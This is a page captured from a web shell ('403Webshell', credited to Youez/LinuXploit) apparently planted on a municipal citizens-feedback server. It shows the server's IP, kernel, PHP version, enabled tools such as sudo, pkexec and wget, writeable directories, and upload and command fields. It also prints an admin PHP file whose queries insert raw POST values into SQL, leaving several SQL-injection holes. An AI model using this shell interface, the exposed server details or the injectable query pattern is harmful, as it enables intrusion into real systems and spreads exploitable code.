403Webshell
Server IP : 80.241.246.6  /  Your IP : 216.73.216.188
Web Server : Apache/2.4.25 (Debian)
System : Linux kharagauli 4.9.0-19-amd64 #1 SMP Debian 4.9.320-2 (2022-06-30) x86_64
User : www-data ( 33)
PHP Version : 7.0.33-0+deb9u12
Disable Function : pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wifcontinued,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : ON  |  Pkexec : ON
Directory :  /var/www/kharagauli_new/Citizens_feedback/admin/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :

[ Back ]     

Current File : /var/www/kharagauli_new/Citizens_feedback/admin/interactive.php
<?php session_start();
$res=0;

function getParcelType($ParcelTypeId){
	global $baza;
	$ptk=mysqli_query($baza,'select * from Services where ID='.$ParcelTypeId);
	if($row=mysqli_fetch_array($ptk,1))
		return $row['Type'];
	}

if(isset($_SESSION['admin']))
if(isset($_POST['f'])){
	include 'conf.php';
	$Refresh=''; 
	$NoInterface=true;
	include 'functions.php';
	$f=$_POST['f'];
	
	if($f=='checkPID'){
		$ID=$_POST['pid'];
		$ptk=mysqli_query($baza,'select * from cf_PersonalIDs where ID='.$ID);
		$res=mysqli_num_rows($ptk);
		}else
	if($f=='deleePersonalID'){
		$ID=$_POST['id'];
		$ptk=mysqli_query($baza,'delete from cf_PersonalIDs where ID='.$ID);
		if($ptk) $res=mysqli_affected_rows($baza);
		}else
	if($f=='getUserInfo'){
		$ID=$_POST['uid'];
		$ptk=mysqli_query($baza,'select * from cf_Respondents where ID='.$ID);
		if($row=mysqli_fetch_array($ptk,1))
			$res=$row;
		}else
	if($f=='MessageDelete'){
		$ID=(int)$_POST['id'];
		$ptk=mysqli_query($baza,'delete from cf_Messages where ID='.$ID);
		if(!$ptk) $res=mysqli_error($baza);
		}else
	if($f=='MessageReaded'){
		$ID=(int)$_POST['id'];
		$ptk=mysqli_query($baza,'update cf_Messages set Readed=1 where ID='.$ID);
		if(!$ptk) $res=mysqli_error($baza);
		}else
	if($f=='setProgramSort'){
		$ss=$_POST['ss'];
		$i=0;
		foreach($ss as $s){ 
			$sql='update cf_Programs set Pos='.$i.' where ID='.$s;
			mysqli_query($baza,$sql);
			$i++;
			}
		}else
	if($f=='setClassesSort'){
		$ss=$_POST['ss'];
		$i=0;
		foreach($ss as $s){ 
			$sql='update cf_ProgramClasses set Pos='.$i.' where ID='.$s;
			mysqli_query($baza,$sql);
			$i++;
			}
		}else
	if($f=='setProgramActive'){ 
		$num=(int)$_POST['num'];
		$active=(int)$_POST['active'];
		$sql='update cf_Programs set Active='.$active.' where ID='.$num;
		mysqli_query($baza,$sql);
		}else
	if($f=='setArchiveActive'){ 
		$num=(int)$_POST['num'];
		$active=(int)$_POST['active'];
		$sql='update cf_ProgramClasses set Archive='.$active.' where ID='.$num;
		$ptk=mysqli_query($baza,$sql);
		$res=array($ptk,$sql);
		}else
	if($f=='setClassesActive'){ 
		$num=(int)$_POST['num'];
		$active=(int)$_POST['active'];
		$sql='update cf_ProgramClasses set Active='.$active.' where ID='.$num;
		mysqli_query($baza,$sql);
		}else
			$res=$f;
	} else print_r($_POST);
if(is_array($res)) echo json_encode($res);
	else echo $res;
?>

Youez - 2016 - github.com/yon3zu
LinuXploit